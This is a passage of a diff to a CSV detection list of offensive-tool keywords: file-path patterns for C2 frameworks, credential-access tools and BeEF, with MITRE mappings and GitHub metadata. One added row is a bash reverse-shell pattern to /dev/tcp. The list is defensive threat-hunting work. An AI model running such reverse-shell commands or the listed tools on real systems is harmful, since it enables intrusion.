TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1038","224","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" -"*/beef.git*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*/beef/extensions/*.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*/beef_bind_shell/*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*/beef_common.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*/beefbind/*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*/beefproject/*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*/BeaconTool.java*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1038","225","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" +"*/beef.git*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*/beef/extensions/*.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*/beef_bind_shell/*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*/beef_common.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*/beefbind/*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*/beefproject/*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" "*/Ben0xA/*","offensive_tool_keyword","Github Username","Github username of known powershell offensive modules and scripts","T1059 - T1027 - T1064 - T1086 - T1191 - T1202","TA0002 - TA0003 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Ben0xA","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/BeRoot.git*","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1053.005 - T1069.002 - T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - T1007","TA0007 - TA0003 - TA0002 - TA0009 - TA0040 - TA0010","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","1","N/A","N/A","10","2262","488","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" "*/beRoot.py*","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1053.005 - T1069.002 - T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - T1007","TA0007 - TA0003 - TA0002 - TA0009 - TA0040 - TA0010","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","1","N/A","N/A","10","2262","488","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" -"*/beroot.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/beroot.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*/BesoToken.cpp*","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","1","N/A","10","1","91","11","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z" "*/BesoToken.exe*","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","1","N/A","10","1","91","11","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z" "*/BesoToken.git*","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","1","N/A","10","1","91","11","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z" -"*/bettercap*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*/bettercap*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*/bh_owned.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*/bhqc.py -*","offensive_tool_keyword","bloodhound-quickwin","Simple script to extract useful informations from the combo BloodHound + Neo4j","T1087 - T1087.001 - T1018 - T1069 - T1069.002","TA0007 - TA0003 - TA0004","N/A","N/A","AD Enumeration","https://github.com/kaluche/bloodhound-quickwin","1","0","N/A","6","2","162","17","2023-07-17T14:31:51Z","2021-02-16T16:04:16Z" "*/BIFFRecordEncryption.cs*","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","6","522","83","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" "*/bin/0d1n*","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","","N/A","","","" -"*/bin/AceLdr*","offensive_tool_keyword","cobaltstrike","Cobalt Strike UDRL for memory scanner evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/AceLdr","1","1","N/A","10","10","712","123","2023-09-28T19:47:03Z","2022-08-11T00:06:09Z" -"*/bin/fake-sms*","offensive_tool_keyword","fake-sms","A simple command line tool using which you can skip phone number based SMS verification by using a temporary phone number that acts like a proxy.","T1598.003 - T1514","TA0003 - TA0009","N/A","N/A","Defense Evasion","https://github.com/Narasimha1997/fake-sms","1","0","N/A","8","10","2513","167","2023-08-01T15:34:41Z","2021-02-18T15:18:50Z" +"*/bin/AceLdr*","offensive_tool_keyword","cobaltstrike","Cobalt Strike UDRL for memory scanner evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/AceLdr","1","1","N/A","10","10","714","123","2023-09-28T19:47:03Z","2022-08-11T00:06:09Z" +"*/bin/bash -c 'bash -i >& /dev/tcp/*/* 0>&1'*","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z" +"*/bin/fake-sms*","offensive_tool_keyword","fake-sms","A simple command line tool using which you can skip phone number based SMS verification by using a temporary phone number that acts like a proxy.","T1598.003 - T1514","TA0003 - TA0009","N/A","N/A","Defense Evasion","https://github.com/Narasimha1997/fake-sms","1","0","N/A","8","10","2514","167","2023-08-01T15:34:41Z","2021-02-18T15:18:50Z" "*/bin/gorsair *","offensive_tool_keyword","Gorsair","Gorsair hacks its way into remote docker containers that expose their APIs","T1552","TA0006","N/A","N/A","Exploitation tools","https://github.com/Ullaakut/Gorsair","1","0","N/A","N/A","9","825","74","2023-09-09T13:18:33Z","2018-08-02T16:49:14Z" -"*/bin/hakrawler*","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","0","N/A","6","10","3967","458","2023-07-22T19:39:11Z","2019-12-15T13:54:43Z" -"*/bin/posh*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*/bin/pupysh*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/bin/hakrawler*","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","0","N/A","6","10","3971","458","2023-07-22T19:39:11Z","2019-12-15T13:54:43Z" +"*/bin/nxcdb*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/bin/posh*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*/bin/pupysh*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*/bin/read_i.php?a1=step2-down-b&a2=*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*/bin/read_i.php?a1=step2-down-c&a2=*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*/bin/read_i.php?a1=step2-down-j&a2=*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" @@ -2840,17 +2846,17 @@ "*/bin/read_i.php?a1=step2-down-r&a2=*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*/bin/read_i.php?a1=step2-down-u&a2=*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*/bin/Sleeper.o*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","1","N/A","10","10","151","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" -"*/bin/unshackle*","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Fadi002/unshackle","1","0","N/A","10","10","1482","83","2023-09-23T15:54:14Z","2023-07-19T22:30:28Z" -"*/bin/wapiti*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-09-27T07:26:22Z","2020-06-06T20:17:55Z" -"*/bind_powershell.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*/bin/unshackle*","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Fadi002/unshackle","1","0","N/A","10","10","1485","84","2023-09-23T15:54:14Z","2023-07-19T22:30:28Z" +"*/bin/wapiti*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*/bind_powershell.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" "*/bin-sploits/*.zip*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" -"*/BITB.git*","offensive_tool_keyword","bitb","Browser templates for Browser In The Browser (BITB) attack","T1056.001 - T1134 - T1090","TA0005 - TA0006 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/mrd0x/BITB","1","1","N/A","10","10","2645","463","2023-07-11T04:57:46Z","2022-03-15T16:51:39Z" -"*/BITB-main*","offensive_tool_keyword","bitb","Browser templates for Browser In The Browser (BITB) attack","T1056.001 - T1134 - T1090","TA0005 - TA0006 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/mrd0x/BITB","1","0","N/A","10","10","2645","463","2023-07-11T04:57:46Z","2022-03-15T16:51:39Z" +"*/BITB.git*","offensive_tool_keyword","bitb","Browser templates for Browser In The Browser (BITB) attack","T1056.001 - T1134 - T1090","TA0005 - TA0006 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/mrd0x/BITB","1","1","N/A","10","10","2646","464","2023-07-11T04:57:46Z","2022-03-15T16:51:39Z" +"*/BITB-main*","offensive_tool_keyword","bitb","Browser templates for Browser In The Browser (BITB) attack","T1056.001 - T1134 - T1090","TA0005 - TA0006 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/mrd0x/BITB","1","0","N/A","10","10","2646","464","2023-07-11T04:57:46Z","2022-03-15T16:51:39Z" "*/bitcoin-getaddr.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/bitcoin-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/bitcoinrpc-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/bitsadmin/bitsadmin.cmd*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - 